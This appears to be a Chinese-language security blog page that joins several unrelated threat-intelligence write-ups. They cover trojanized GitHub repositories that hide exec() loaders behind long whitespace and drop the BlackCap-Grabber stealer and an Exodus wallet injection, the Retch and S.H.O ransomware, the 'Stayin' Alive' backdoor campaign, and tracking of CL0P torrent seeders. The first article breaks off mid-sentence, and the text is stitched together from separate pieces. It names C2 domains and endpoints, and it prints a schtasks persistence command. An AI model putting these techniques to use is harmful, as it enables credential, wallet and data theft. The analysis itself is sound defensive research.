HireHackking

隨著技術的發展，世界之間的聯繫變得更加緊密，攻擊者使用的技術也在不斷發展。攻擊者通過不斷地利用供應鍊和代碼庫中復雜的相互依賴關係，對組織、個人和社區造成重大風險。 近年來最令人擔憂的攻擊趨勢之一是供應鏈攻擊的增加，尤其是那些對代碼庫的攻擊，這是全球網絡安全領域的一個難題。根據歐盟網絡安全機構(ENSA)發布的一份報告，62%的組織受到第三方網絡事件的影響，只有40%的受訪組織表示他們了解第三方網絡和隱私風險。更令人擔憂的是，38%的受訪組織表示，他們不知道哪些網絡問題是由第三方組件引起的，最近涉及供應鏈的網絡攻擊包括Apache Log4j, SolarWinds Orion和3CX的3CXDesktopApp。 在現代軟件開發中，開發人員依賴第三方組件來簡化開發過程，這使開發人員能夠創建成本效益高、效率高且功能豐富的應用程序。但是，當這些受信任的組件受到攻擊時會發生什麼？ 攻擊者可以通過組織供應鏈中不太安全的元素，如第三方供應商或軟件存儲庫間接滲透系統，甚至允許他們破壞受信任的組件，從而在更大、更安全的環境中獲得立足點。惡意代碼經常嵌入看似合法的軟件庫中，當開發人員集成這些組件，就會不知不覺地將漏洞和其他網絡安全風險引入他們的核心系統。 本文深入研究了攻擊者在看似合法的應用程序和代碼庫中植入惡意有效負載的複雜方法，並以最近示例作為研究對象。 技術分析攻擊者復制合法GitHub存儲庫的示例研究，然後用惡意代碼進行木馬化和攻擊，策略性地用關鍵字填充其存儲庫描述部分，以最大限度地提高其在GitHub搜索中的可見性。 通過此分析，我們可以深入了解攻擊者攻擊第三方組件的攻擊過程和技術，以下部分將使用活動命令與控制(CC)服務器研究其中一個被木馬化的項目，了解其內部工作原理。 通過exec smugglingweb請求發起攻擊 Discord-Boost-Tool的存儲庫名稱和存儲庫的所有者 在所舉示例中，攻擊的第一階段採用了一種我們稱之為exec smuggling的新技術。該技術在一長串空白字符之後放置一個有效負載，將惡意內容從屏幕上推送出去。使用這種技術，下一階段通過惡意請求調用檢索，≠≠使用Python內置方法exec()執行。接下來，我們將根據示例概述exec smuggling 的具體實現步驟。 導入必要的依賴項在導入request和fernet之前，惡意軟件使用以下命令在Python中安裝必要的依賴項，通過該命令安裝依賴項包： 惡意軟件安裝並導入必要的依賴項 將惡意代碼對象移出白名單攻擊者會添加一長串空白字符(在本例中是521個空格)，將惡意代碼移出白名單，從而隱藏代碼對象，不被人發現。 使用exec()執行惡意負載 最後，通過調用Python的exec方法來執行代碼對象。以下是解密後的惡意代碼片段： 此代碼對象向攻擊者的命令和控制(CC)服務器發出web請求，該服務器包含惡意負載，然後導致第二階段的攻擊。 執行走私後攻擊進入第二階段 攻擊的第二階段據分析，攻擊的第二階段側重於為進一步開發準備攻擊環境。 設置環境第二階段包括準備環境的滴管，最初，它安裝一系列Python包，如requests、httpx、pyperclip、pyotp、winregistry、psutil、pycryptodomex和asyncio等。然後，它識別用戶系統上安裝的所有Python版本，並檢查每個版本的site-packages中是否存在Cryptodome目錄。如果找到，它將此目錄複製為Crypto，可能是為了確保與原有庫的向後兼容性。隨後，腳本創建一個解密有效負載，將其寫入用戶APPDATA目錄中的一個名為pl.py的文件，在執行它而不顯示窗口。 第二階段使用Python的子進程模塊進一步準備環境 攻擊的第三階段環境準備好後，惡意軟件進入攻擊過程的第三階段。 BlackCap-Grabber第三階段包含一個修改版的開源信息竊取項目，名為BlackCap-Grabber。它具有以下功能： 提取瀏覽器密碼、cookie和瀏覽歷史記錄； 檢索系統信息； 從應用程序和工具(如Steam, MetaMask和Exodus)竊取登錄憑據； 繞過TokenProtector； 劫持Windows剪貼板以更改加密貨幣地址，將其內容替換為攻擊者的錢包地址以及其他功能。 重要的是，原來的BlackCap-Grabber包括雙鉤（dual hook）技術，使用這種技術，代碼的開發者也將收到由攻擊者(BlackCap-Grabber用戶)竊取的信息的副本。像BlackCap-Grabber-NoDualHook這樣的項目會從源代碼中移除植入的DualHook。 在執行時，惡意軟件將受攻擊系統的ComputerName發送到其CC服務器。然後安裝必要的Python包以確保惡意軟件的功能。請注意，此代碼不是原始BlackCap-Grabber的一部分，而是由攻擊者添加的。 惡意軟件發送帶有受害者計算機名的POST請求，並安裝額外的依賴項 下圖展示了由惡意軟件及其處理受害者信標的請求處理程序生成的初始網絡流量的示例。 向包含受害者用戶名的/downloadhandler發出POST請求 攻擊者添加的另一個功能是出口注入（exodus-injection），這在原始的BlackCap-Grabber源代碼中不存在。出口注入允許攻擊者使用攻擊技術從Exodus Crypto Wallet(一種受新加密貨幣用戶歡迎的加密貨幣錢包)竊取憑證和其他敏感信息。攻擊者在其攻擊鏈中使用多個開源的Exodus-Injection項目(https://github.com/loTus04/Exodus-Injection和https://github.com/dropout1337/exodus-injection)。 BlackCap-Grabber配置 BlackCap-Grabber的主要功能是劫持Windows剪貼板以更改加密貨幣地址，從受攻擊的系統中檢索敏感信息，並從各種web瀏覽器將其保存到文件中以供洩露。 BlackCap-Grabber準備敏感信息，如瀏覽器cookie、加密貨幣地址和剪貼板信息 BlackCap-Grabber使用upload()方法處理敏感信息數據，以便上傳到攻擊者的基礎設施 BlackCap-Grabber使用LoadRequests方法從受害者發送POST請求以進行數據提取 使用上圖中的邏輯，攻擊者向基礎結構發送包含洩露的密碼、cookie和加密貨幣地址的POST請求。 攻擊者通過POST請求將洩露的數據發送到/handler終端 在此示例中，惡意軟件將包含瀏覽器cookie等內容的惡意包從受攻擊系統中洩漏到攻擊者控制的主機。攻擊者使用web請求處理程序來處理從受害設備上成功竊取的包。 另外一個密碼示例通過POST請求發送到/handler終端 以上是我們發現的附加POST請求，其中包含由攻擊者從受攻擊的受害者向處理程序/句柄洩露的敏感信息。 探索Exodus和ElectronJS組件經過調查，我們確定Exodus桌面錢包是使用ElectronJS框架構建的，基於本地Exodus安裝的資源目錄中存在的app.asar文件，該框架用於捆綁和打包應用程序的資源。 Asar壓縮文件類似於.zip或.tar文件，但專門為ElectronJS應用程序設計。 攻擊鏈第三階段的一個主要組成部分涉及通過操作底層的ElectronJS應用程序在受攻擊用戶的設備上植入惡意的Exodus桌面錢包應用程序，這使得攻擊者可以竊取與Exodus錢包相關的憑證，從而實施攻擊，並最終竊取屬於受害者的加密貨幣和不可替代代幣(nft)。 ElectronJS和Exodus這兩個漏洞是由關聯的。早在2018年，基於遠程代碼執行漏洞CVE-2018-1000006（CVSS 8.8）的Electron就可以被利用。研究人員很快指出，攻擊者可以通過濫用電子協議處理程序來利用這個漏洞。 如前所述，ElectronJS應用程序被打包為app.asar壓縮文件，其中包含應用程序的源代碼和各種應用程序資產。 Asar壓縮文件類似於.zip或.tar文件，是專門為ElectronJS應用程序設計。 什麼是Exodus?Exodus是一個數字資產平台，允許用戶存儲、管理和交換加密貨幣和NFT。 Exodus提供各種錢包，如Web3錢包、移動錢包、桌面錢包、Trezor硬件錢包，以及與加密貨幣應用程序的集成。 Exodus桌面錢包應用程序Exodus桌面錢包（Exodus Desktop Wallet）是Exodus的桌面應用程序。 Exodus桌面錢包支持所有主要的操作系統，如微軟、MacOS和Linux，通過用戶友好的圖形用戶界面(GUI)，可以存儲和交易主要的加密貨幣和NFT。 通過web GUI訪問Exodus桌面錢包Exodus桌面錢包提供了一個直觀的界面來訪問加密貨幣錢包。解鎖加密貨幣錢包需要密碼，如Exodus桌面錢包應用程序GUI所示。 在設置用於備份錢包的助記符秘密短語時，Exodus會讓用戶打印助記符密鑰作為安全設備。 使用物理助記鍵恢復Exodus錢包 當用戶試圖恢復錢包時，Exodus可能會要求他們參考助記秘鑰的打印副本，並根據提供的數字選擇正確的單詞。出於安全考慮，Exodus被設計成一個使用密碼和助記短語組合的自我保管錢包。 探索Exodus ElectronJS應用程序的主要組件Exodus桌面錢包的app.asar文件可以解壓縮到目標目錄。在這個目錄中，我們看到了應用程序的根目錄，其中包括node_modules、src和應用程序的package.json。 Exodus桌面錢包的NodeJS後端 關鍵後端文件相關的Exodus桌面錢包 Exodus ElectronJS應用程序的主要組件包括應用程序的主邏輯(包含在src/app/main/index.js中)、錢包組件(包含在src/app/wallet/index.js中)和表示邏輯(包含在src/app/static/中)，後者將NodeJS後端文件導入到應用程序的前端表示中。 正在攻擊Exodus桌面錢包的ElectronJS應用程序通過使用注入技術，攻擊者可以通過替換app.asar壓縮，將Exodus桌面錢包的ElectronJS應用程序替換為惡意的ElectronJS應用程序，該壓縮文件由Exodus桌面錢包讀取。這個應用程序是一個全功能的複製品Exodus桌面錢包，攻擊者將其功能改變，以竊取錢包信息，包括密碼和助記符信息。 inject()函數負責注入惡意的Exodus桌面錢包 在上圖所示的代碼中，攻擊者執行一系列檢查，以確定受攻擊的設備是否安裝了Exodus Desktop Wallet。 下面的代碼片段是在Windows安裝中Exodus應用程序使用的app.asar文件的位置。 Exodus錢包桌面Windowsapp.asar路徑： 同時，下面的代碼片段是Linux安裝中Exodus應用程序使用的app.asar文件的位置： Exodus錢包桌面Linuxapp.asar路徑： 如果發現Exodus，惡意代碼將繼續如下操作： 1.從攻擊者控制的基礎設施下載並讀取惡意修復的app.asar文件。 2.終止現有的Exodus進程。 3.將惡意的app.asar寫入Exodus應用程序資源目錄中的Exodus app.asar文件中。 如果在設備上找不到Exodus桌面錢包的行為如果在目標設備上沒有找到Exodus，惡意代碼將繼續下載文件stromrechung.py到\Microsoft\Windows\Start Menu\Programs\Startup。該文件將在系統啟動時執行。 如果沒有找到Exodus，“miner.exe”將從另一個攻擊者域下載並安裝 Python用於執行惡意批處理文件，其中包含“miner.exe”的下載和運行邏輯。 惡意文件stromrechnung.py是一個python文件，包含以下邏輯： 1.為Windows批處理文件創建一個Python函數； 2.使用陸地驅動程序(LoLDrivers)編寫邏輯以繞過UAC； 3.編寫PowerShell命令將加密貨幣挖礦器(miner.exe)下載到受害者的設備上； 4.運行Python函數，該函數使用subprocess.popen 方法執行批處理文件。 在Exodus桌面錢包的ElectronJS應用程序中註入代碼在示例中，有三個不同的文件被攻擊者改變了，具體將在後面介紹。 惡意注入後端unlock()函數(src/app/wallet/index.js)主要注入發生在src/wallet/index.js中，攻擊者在解鎖函數中註入惡意POST請求。 POST請求包含錢包密碼、助記密鑰和錢包目錄。 文件src/app/wallet/index.js被攻擊，洩露密碼、助記符和錢包信息給攻擊者 允許打開錢包域(4.9.1.2. src/app/main/index.js)即使在乾淨的Exodus應用程序將錢包域限制為Exodus的位置，攻擊者也可以修改主index.js文件以允許所有錢包域。 文件src/app/main/index.js修改域名列表以允許所有錢包域名 4.9.1.3. src/static/wallet.html：禁用內容安全策略(CSP)內容安全策略(CSP)作為一個額外的安全層，用於識別和抵禦特定形式的攻擊，例如跨站點腳本(XSS)和數據注入攻擊。 connect-src指令限制了可以通過腳本接口加載的url。 文件src/app/main/index.js被修改為禁用應用程序的CSP 我們發現，攻擊者有效地禁用了CSP，以允許從所有url到Exodus wallet.js組件的數據連接。 Discord-Boost-Tool GitHub存儲庫接下來，我們將探討Discord-Boost-Tool的特性及其一些有趣的組件。 discord-boost-tool的起源在本文所列舉的示例中，受攻擊的Discord-Boost-Tool源自2022年底的原始Discord-Boost-Tool存儲庫。這個工具允許用戶使用NitroBot帳戶來提升他們的Discord服務器，它被GitHub用戶PatrickPagoda迅速分叉（fork）並修改，通過惡意PyPi包攻擊不知情的用戶，該用戶多次將惡意Python包上傳到PyPi註冊表中。值得一提的是，與PatrickPagoda相關的原始GitHub帳戶在7月底至8月的某個時候

FortiGuard實驗室每兩週收集一次感興趣的勒索軟件變體的數據，並發布有關報告，旨在讓讀者了解不斷發展的勒索軟件形勢以及抵禦這些變體的緩解措施，本文要講的是Retch和S.H.O勒索軟件。 受影響的平台：Microsoft Windows； 受影響方：Microsoft Windows用戶； 影響：加密和洩露受害者的文件，並要求贖金解密文件； 嚴重性級別：高； Retch勒索軟件概述Retch是2023年8月中旬首次發現的一種新的勒索軟件變體，它在受攻擊設備上加密文件，並留下兩張勒索信，要求受害者支付贖金來解密文件。 攻擊媒介雖然目前無法獲得有關Retch勒索軟件攻擊者使用的攻擊媒介的信息，但是它可能與已知其他勒索軟件組織有顯著關聯。 目前，來自以下國家的Retch勒索軟件樣本已提交給公共文件掃描服務: 美國 伊朗 德國 俄羅斯 法國 哥倫比亞 韓國 義大利 一旦勒索軟件運行，它就會查找並加密具有以下文件擴展名的文件： 以下目錄不支持文件加密： 'Windows' 'Program Files' 'Program Files (x86)' 勒索軟件為加密文件添加了“.Retch”擴展名。 由Retch勒索軟件加密的文件 然後，它會在每個加密文件的文件夾中放上一條標記為“Message.txt”的勒索信。 Retch勒索軟件釋放的勒索信 在勒索信中，攻擊者要求受害者支付價值300歐元的比特幣來解密文件，由於贖金要求較低，Retch勒索軟件的攻擊目標很可能是一般消費者而不是企業。如下圖所示，贖金信息有法語和英語兩種版本，這使我們相信Retch勒索軟件主要針對法國用戶。然而，進一步的調查顯示，情況並非如此。 研究人員還發現，放在桌面上的勒索信與“Message.txt”不同。留在桌面上的勒索信標有“HOW TO RECOVER YOUR FILES.txt”，並要求受害者支付價值1000美元的比特幣進行文件解密。這份勒索信有一個不同的聯繫電子郵件地址，其中包括攻擊者的比特幣錢包地址。 Retch勒索軟件在桌面上留下的勒索信標有“HOW TO RECOVER YOUR FILES.txt” 事實證明，Retch勒索軟件是基於一個公開的勒索軟件源代碼開發的，該源代碼聲稱用於教育目的，似乎是基於一款著名的開源勒索軟件“HiddenTear”。默認情況下，開源勒索軟件的勒索信如下圖所示，攻擊者似乎只在桌面上定制了只有英文的勒索信，而其他所有位置的勒索信都沒有受到影響，這表明Retch勒索軟件並沒有像最初想像的那樣針對法國用戶。如上所述，向公共文件掃描服務提交文件的國家很普遍，這進一步表明研究人員的懷疑是正確的。 在我們進行調查時，攻擊者的比特幣錢包沒有記錄任何交易。 S.H.O勒索軟件概述攻擊媒介目前還沒有關於S.H.O勒索軟件攻擊者使用的攻擊媒介的信息，不過，它可能與已知其他勒索軟件組織有顯著關聯。 S.H.O勒索軟件樣本已提交給以下國家的公共文件掃描服務： 美國； 加拿大； 勒索軟件執行勒索軟件運行後，會對受攻擊設備上的文件進行加密，並添加五個隨機字母和數字作為文件擴展名。 S.H.O勒索軟件加密的文件 S.H.O嘗試使用以下擴展名加密文件： 以下文件被排除在所有目錄外： 排除加密的文件列表 這些目錄也被排除在加密內容之外： 排除加密的目錄列表 S.H.O使用RSA公鑰和Microsoft“Rijndael Managed”C#庫對每個文件進行加密。 文件加密例程 在完成加密後，它會用自己的壁紙替換桌面壁紙，要求受害者找到並閱讀文件“readme.txt”，這是一封勒索信。 被S.H.O勒索軟件取代的壁紙 FortiGuard實驗室發現了兩種S.H.O勒索軟件變體，它們留下了不同的勒索信，儘管勒索信上有屬於攻擊者的不同比特幣地址，但贖金費用始終保持在200美元。 S.H.O勒索軟件變體留下的勒索信 另一個S.H.O勒索軟件變體留下的勒索信 贖金信息恐嚇受害者支付贖金，在調查時，這兩個比特幣錢包都不可用。 Fortinet客戶已經通過其AntiVirus和FortiEDR服務受到保護，免受這些惡意軟件變體的影響，如下所示： FortiGuard實驗室檢測到具有以下殺毒軟件簽名的Retch勒索軟件樣本： 1.MSIL/Filecoder.AK!tr.ransom： FortiGuard實驗室檢測的S.H.O勒索軟件樣本具有以下反病毒簽名。 2.MSIL/Filecoder.APU!tr.ransom：FortiGuard防病毒服務包括FortiGate、FortiMail、forticclient和FortiEDR。運行當前防病毒更新的Fortinet EPP客戶也受到保護。 IOC 緩解措施1.由於易受干擾、日常運營受攻擊、對組織聲譽的潛在影響，以及個人身份信息（PII）的不必要破壞或發布等，保持所有AV和IPS簽名的最新性至關重要。 2.由於大多數勒索軟件都是通過網絡釣魚傳播的，組織應考慮利用Fortinet解決方案來培訓用戶了解和檢測網絡釣魚威脅。 3.FortiFish網絡釣魚模擬服務使用真實世界的模擬來幫助組織測試用戶對網絡釣魚威脅的意識和警惕性，並在用戶遇到有針對性的網絡釣魚攻擊時培訓和加強正確的做法。 4.增加內部培訓，幫助最終用戶學習如何識別和保護自己免受各種類型的網絡釣魚攻擊，並可以輕鬆添加到內部培訓計劃中。 5.組織需要對數據備份的頻率、位置和安全性進行根本性的更改，以有效應對勒索軟件不斷演變和迅速擴大的風險。再加上數字供應鏈的攻擊和員工遠程辦公進入網絡，攻擊可能來自任何地方，這是一個真正的風險。 6.基於雲的安全解決方案，如SASE，用於保護離網設備，高級終端安全，如EDR（終端檢測和響應）解決方案，可以在攻擊中期中斷惡意軟件，以及零信任訪問和基於策略和上下文限制，對應用程序和資源的訪問的網絡分段策略，都應該進行調查，以最大限度地降低風險並減少成功勒索軟件攻擊的影響。 作為業界領先的完全集成安全結構的一部分，Fortinet還提供了廣泛的技術和基於人工的即服務產品組合，為你的安全生態系統提供本地協同和自動化。 7.CISA、NCSC、FBI和HHS等組織警告勒索軟件受害者不要支付贖金，部分原因是贖金並不能保證文件會被找回。

在過去的幾個月裡，Check Point Research一直在追踪分析“STAYIN’ ALIVE ”，這是一項至少從2021年就開始活躍的持續活動。該活動在亞洲開展，主要針對電信行業和政府機構。 “Stayin’Alive”活動主要由下載和加載程序組成，其中一些被用作針對知名亞洲組織的初始攻擊載體。發現的第一個下載程序名為CurKeep，目標是越南、烏茲別克斯坦和哈薩克斯坦。 觀察到的工具的簡單化性質以及它們的流行表明它們是一次性的，主要用於下載和運行額外的有效負載，這些工具與任何已知攻擊者創建的產品沒有明顯的代碼重疊，並且彼此之間沒有太多共同之處。然而，它們都與ToddyCat基礎設施有關。 該活動利用魚叉式網絡釣魚郵件利用DLL側加載方案來傳播壓縮文件，最明顯的是劫持Audinate的Dante Discovery軟件(CVE-2022-23748)中的dal_keepalives.dll。 “STAYIN’ ALIVE ”活動背後的攻擊者利用多個獨特的加載程序和下載器，所有這些加載程序和下載器都連接到同一套基礎設施，與一個通常被稱為“ToddyCat”的攻擊相關聯。 後門和加載程序的功能是非常基本和高度可變的。這表明攻擊者將它們視為一次性的，並且可能主要使用它們來獲得初始訪問權限。 CurKeep後門調查是從2022年9月發送給越南電信公司的一封電子郵件開始的，該電子郵件被上傳到VirusTotal。郵件主題CHỈ THỊ VỀ VIỆC QUY ĐỊNH QUẢN LÝ VÀ SỬ DỤNG USER，翻譯為“管理和使用說明：用戶規定”，這可能表明目標在IT部門工作。電子郵件包含一個ZIP附件，裡面有兩個文件：一個合法的簽名文件mDNSResponder.exe，重命名為匹配電子郵件，以及一個名為dal_keepalives.dll的側加載DLL。 原始CurKeep電子郵件誘餌 首先運行合法的可執行文件(由Zoom簽名)，它加載dal_keepalives.dll，然後加載一個簡單的後門程序，稱為“CurKeep”。在初始執行期間，它將自己和合法的exe文件複製到%APPDATA%文件夾中，並設置一個名為Reserved的環境變量來指向它的路徑。該變量用於名為AppleNotifyService的計劃任務，該任務的目的是維護負載執行的久性。 CurKeep攻擊鏈 根據新發現的被劫持DLL方案，我們發現了多個部署相同工具的檔案： Саммит 2022 г (парол - 0809).rar，可能用於針對烏茲別克斯坦，因為它是從烏茲別克斯坦上傳的，俄文文本。 QForm V8.zip ，QForm是一個仿真軟件，該文件託管在一個已知的研究門戶域名上。 Приказ №83 от 29.05.2023г.rar，可能用於針對哈薩克斯坦，假設它再次從哈薩克斯坦上傳，並帶有俄語文本。 CurKeep負載有效負載本身是一個非常小但高效的10kb文件。它包含26個函數，不使用任何庫進行靜態編譯，在執行時，它首先從msvcrt.dll生成一個導入數組，以獲得常見的C運行時函數，因為它沒有。 函數導入 全局結構構造 函數主要有效負載邏輯由三個主要函數組成：report, shell, 和file。它們中的每一個都被分配到一個不同的消息類型，該消息類型被發送到CC服務器。當執行時，負載一開始運行report函數，將基本偵察信息發送到CC服務器。然後，它創建兩個獨立的線程來重複運行shell和file函數。 report- CurKeep收集有關受攻擊計算機的信息，包括計算機名稱、用戶名、systeminfo的輸出以及C：\ProgramFiles(x86)和C：\Program Files下的目錄列表。 shell -以JSON格式發送計算機名，使用簡單的異或加密和base64編碼到CC。預期的響應包含命令字符串，命令之間以“|”分隔。它執行每個命令並將輸出發送到CC服務器。 file -發送與shell線程相同的消息，並接收如下格式的字符串' [FILE_ID]|[FULL_PATH]|[BASE64_ENCODED_FILE_DATA] '。它解析字符串並將數據寫入文件。 通信後門通信是基於HTTP的，每個函數的結果通過post請求路徑/API /report/API /shell或/API /file發送到匹配的API。結果被加密並存儲在JSON ‘msg’字段中。 基礎設施分析 我們發現的所有CurKeep樣本都與一組CC服務器通信，這些服務器鏈接到同一個TLS證書：fd31ea84894d933af323fd64d36910ca0c92af99。該證書在多個IP地址之間共享，我們認為它們都與同一個攻擊者有關。 在多個IP地址之間共享證書 除了證書之外，我們還觀察到域的類似註冊模式以及ip使用重複的asn。 相似的註冊模式和重複的asn 新發現的工具新發現的基礎設施揭示了幾個額外的樣本，主要是加載程序，用於同一地區的針對性攻擊，幾乎所有加載程序都是通過類似的方法執行的，最常見的是DLL側加載。加載程序的性質及其多樣性表明，攻擊者利用簡單的加載程序進行攻擊，仔細選擇部署額外工具的目標。 CurLu加載程序與此基礎結構相關聯的最常見的工具是CurLu加載程序，它通常通過濫用bdch.dll的側加載來加載，但這不是使用的唯一方法。這個加載程序的主要功能是聯繫CC服務器並接收要加載的DLL，然後調用預定義的導出。這是通過發送一個URI?cur=[RANDOM]的請求來實現的： 構建隨機請求URL 來自服務器的預期響應是DLL，然後將其加載並映射到內存中。接下來，加載程序搜索兩個預定義導出中的一個，並執行找到的任何導出。 在下載的DLL中搜索導出函數 CurCore其中一個新檢索的有效負載是通過名為incorrect personal information.img的IMG文件傳播的。它是從巴基斯坦上傳到VirusTotal的，利用mscoree.dll劫持部署了另一個名為CurCore的小後門程序。這個CurCore變種也指向一個模仿巴基斯坦電信供應商Nayatel的域名ns01.nayatel.orinafz.com。 當執行時，DLL通過比較執行路徑與C：\ProgramData\OneDrive\來檢查它是否持久化執行。如果沒有，它將自己和合法的PE文件複製到前面提到的OneDrive.exe文件夾下，並使用命令schtasks /create /sc minute /mo 10 /tn 'OneDrive' /tr 'C:\ProgramData\OneDrive\OneDrive.exe創建計劃任務。 如果從正確的路徑執行，它將創建一個線程，該線程初始化一個大型UUID字符串數組，然後繼續加載rpcrt4.dll並動態地導入UuidFromStringA函數。接下來，它使用該函數將整個UUID數組轉換為字節，每次一個UUID。 用於生成shellcode的UUID數組 然後，它使用EnumSystemLocalesA函數來執行從uid創建的shellcode。然後，這個shellcode加載並執行最終的有效負載。 將UUID轉換為字節並執行提取的shellcode CurCore負載CurCore有效負載是一個小而有限的後門。執行時，它加載並解析與winhttp.dll中的HTTP請求和kernel32.dll中的CreatePipe相關的函數(從未使用過)。 接下來，它啟動主循環，其中包含負責向CC域ns01.nayatel.orinafz.com發出HTTP請求的子循環。 HTTP請求由以下結構構建： DWORD custom_checksum; DWORD ukn_1; DWORD message_type; //only being used on ReadFile command WCHAR_T desktop_folder_path[]; custom_checksum是通過對桌面文件夾路徑的WCHAR_T數組中的所有第一個字節求和來計算的。該結構是base64編碼的，並在以下請求中傳輸到服務器： 接收到的響應也是用base64編碼的，它的第一個DWORD是要執行的命令ID。有效負載總共支持3個功能有限的命令，這表明它只用於初始偵察： CurLog加載程序 與同一基礎設施相連的一個加載程序CurLog也被用來針對哈薩克斯坦的主要目標，我們觀察到幾個變體，一些通過DLL執行，另一些通過EXE執行。 CurLog加載程序的一個變體是在一個名為Compatible Products - Vector ver7.1.1.zip的zip文件中提供的，該文件包含一個同名的EXE文件。來自哈薩克斯坦的提交者也上傳了一個同名的DOCX文件，其中描述了一個名為VECTOR的系統及其兼容性。 VECTOR系統描述 當負載執行時，它通過比較執行路徑與C：\Users\Public\Libraries或檢查它是否使用參數-u運行來檢查它是否會持久性運行。如果沒有，它會添加一個計劃任務，並將自己和合法的exe複製到前面提到的文件夾中。 接下來，它聯繫CC服務器並期望接收解碼的十六進制流。如果成功，它將繼續驗證已解碼的十六進制流是否以MZ或cDM開頭，並將其保存到文件中。最後，它基於生成的文件創建一個進程。 針對越南的攻擊我們發現的最古老的變種(見下文)是通過一個以越南ISP為主題的ISO映像從越南上傳的。嚴重混淆的示例驗證它是否在正確的路徑上執行，就像其他加載程序一樣。如果沒有，它將創建目錄C：\ProgramData\ApplicationData\，並將合法的EXE文件複製到該文件夾中，並將惡意的側面加載的DLL文件mscoree.dll複製到該文件夾中。然後，它將4個硬編碼字節寫入一個新文件v2net.dll，該文件用作活動ID，它獲取計算機名，並發送以下網絡請求： 然後使用帶有密鑰0x44的簡單異或加密對網絡響應進行解密。接下來，它檢查第一個字節XOR0x09是否等於0x44，第二個字節XOR0xD7是否等於0x8D。你可能會注意到MZ ^0x09D7=0x448d，從中我們可以推斷CC響應應該包含PE文件。然後將接收到的文件寫入AppData\Roaming\ApplicationData\[HEX_STRING]\common.exe並執行。 StylerServ後門研究中，我們注意到許多加載程序的一個共同特徵：它們的編譯時間戳被修改為2015，其標頭值表明它們是使用Visual Studio 2017編譯的。 副標題顯示Visual Studio 2017(上圖)和2015年的編譯時間戳 繞過這個特徵，我們發現了另外一個示例，該示例由某人上傳，此人也上傳了CurLu加載程序信標的一個變體到127.0.0.1，並在bdch.dll上使用相同的側加載。 新確定的示例名為StylerServ，它與前面提到的加載程序非常不同，因為它被用作被動偵聽器，通過特定端口為特定文件提供服務。當DLL被執行時，它會創建五個線程，每個線程監聽一個不同的端口。在樣本中，我們觀察到以下端口：60810、60811、60812、60813、60814。 創建監聽特定端口的線程 每隔60秒，每個線程都會嘗試讀取一個名為styles .bin的文件。如果該文件可用且文件大小為0x1014，則認為該文件有效，並在後續線程的網絡請求中提供該文件。這些線程監督套接字上演變的一整套行為。其邏輯本質上是，每個線程都可以接收遠程連接，並提供前面提到的stylesers .bin的加密版本。 具有相同名稱的文件(stylesers .bin)也由同一提交者上傳，並使用XOR加密。在StylerServ後門中不存在解密文件的密鑰，但可以通過執行加密分析獲得。當它被解密時，我們可以看到加密的文件看起來像一種配置文件，包含各種文件格式和一些未知的DWORDS： 加密配置 解密配置 受害者研究在我們對這次活動的分析中，我們觀察到亞洲國家的目標一致，即越南、巴基斯坦、烏茲別克斯坦，最突出的是哈薩克斯坦。目標的跡象包括魚叉式網絡釣魚郵件、VirusTotal提交者和文件命名約定。 此外，各種各樣的加載程序和下載程序所使用的域表明，至少有一些目標或最終目標是政府附屬組織，主要在哈薩克斯坦，包括： pkigoscorp[.]com——很可能是為了模仿https://pki.gov.kz/，哈薩克斯坦國家證書頒發機構。 certexvpn[.]com——哈薩克斯坦政府使用的哈薩克VPN軟件。 此外，有跡象表明，其中一次攻擊是圍繞一個名為qform3d的模擬軟件進行的。這包括使用域名qform3d[.]in的使用以及在壓縮文件QForm V8.zip中傳播文件。惡意軟件託管在一個研究門戶網站上，這表明其目標可能從事研究工作。 幕後組織該活動利用了許多目前未知的工具和技術。不同的加載程序和下載器集合可能代表了該攻擊者的初始攻擊媒介，該組織已在該地區活動多年。 本報告中描述的各種工具都是定制的，僅使用一次，因此，它們與任何已知的工具集沒有明顯的代碼重疊，甚至彼此之間也沒有。然而，它們都與一組基礎設施有關，其中一部分與一個名為todddycat的攻擊者有關。 CurLog和CurLu加載程序使用的兩個域是fopingu[.]com和rtmcsync[.]com，它們在該文章中提到過。這兩個域也顯示了解析到149.28.28[.]159的歷史。 雖然這些重疊並不一定表明“STAYIN’ ALIVE ”活動的幕後主使與ToddyCat的幕後主使是同一組織，但很可能兩者有共同的聯繫，共享相同的基礎設施。 總結如上所述，一次性加載程序和下載器的使用正變得越來越普遍，甚至在老練的攻擊者中也是如此；一次性工具的使用使得檢測和分析工作也在變得更加困難，因為它們經常被替換，並且可能從頭開始編寫，這在“STAYIN’ ALIVE ”活動中很明顯。 本文回顧了針對亞洲電信行業的攻擊活動中使用的一些工具，通過基礎設施分析不同後門之間的聯繫時，我們還發現了與ToddyCat的潛在聯繫，這是一個在該地區活動的已知行動者。雖然我們不能完全肯定ToddyCat是這次活動的幕後組織，但很明顯，兩者都使用了相同的基礎設施攻擊求類似的目標。

解決辦法CL0P組織利用Seed傳輸竊取的敏感數據（上） 如上所述，速度是至關重要的。加入torrent的時間窗口很短，每過一秒，找到原始播種者的可能性就會減少。為了解決這個問題，就需要不斷地監控他們的洩漏網站，以獲得新的公告，然後使用磁力鏈接開始節點過程。 一旦連接到torrent，研究人員就可以坐在群裡監視對等點，直到研究人員找到第一個顯示100%完成狀態的人。此時，信息被記錄後將自己從群中刪除。 出於講解需要，研究人員把所有受害組織的名字都改成了Pokémon。 當連接到torrent時，就會輸出。 該輸出應包括以下內容： 所連接對等點的IP地址； 對等點狀態標誌； 完成百分比； 上傳/下載速度； Torrent客戶端； 映射對等點以及Pokémon 在將這些數據點連接起來之後，你最終得到的是一個連接網絡，研究人員可以將其可視化，以便更好地進行分析。 節點映射 上圖關注了三個不同的數據點: 對等點地址； 受害者； 使用中觀察到的客戶端； 研究人員根據對等點在記錄日誌時所觀察到的數據量連接每個端，然後，研究人員用顏色對鏈接進行編碼，如下圖所示，這樣100%的鏈接就會突出。 這允許快速檢查以識別地址，地址分為三類： 經確認的原始播種機； 潛在的原始播種機； 非原始文件(non-original)播種機； 再來看一看Charmander，你會注意到兩條灰色的線指向它，這些都是低於100%的鏈接，研究人員把所有100%的鏈接都編碼為紅色，藍色鏈接將對等點連接到其觀察到的客戶端字符串。如下圖所示： CharmanderPeering Peering在兩個ISP之間交換路由通告，以確保來自第一個ISP的業務能夠到達第二個ISP的客戶，反之亦然。對等操作主要在IXP進行，通常是免費提供或遵照雙方商定的商務協議提供。 在添加每個主機的過程中，當研究人員從受害者切換到對等點時，模式開始出現。 